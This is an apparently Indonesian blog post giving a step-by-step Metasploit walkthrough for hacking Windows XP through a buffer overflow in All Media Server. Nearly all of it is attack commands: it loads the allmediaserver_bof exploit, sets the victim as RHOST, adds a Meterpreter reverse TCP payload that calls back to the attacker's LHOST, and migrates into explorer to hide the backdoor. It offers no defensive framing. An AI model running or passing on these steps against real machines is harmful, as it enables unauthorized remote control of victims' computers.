Selasa, 18 Agustus 2015



 how about we use allmedia server to hack windows xp???

1. make sure that servis all media server are running and connect to internet


2. entry to metasploit
 type, msfconsole klick enter
3. search all modul related all media server
search allmedia, klick enter
4. choose allmedia modul, then input RHOST or target IP

use exploit/windows/misc/allmediaserver_bof, klick enter
show options
set RHOST (IP target)
show options
5. input virus or back door that will use to exploit
set PAYLOAD windows/meterpreter/reserver_tcp
6. input LHOST or IP reserver, then exploit
show options
set LHOST (IP reserver)
show options
exploit, klick enter
7. change back door place to explorer
ps klick enter
migrate (pid explorer)




 





Tidak ada komentar:

Posting Komentar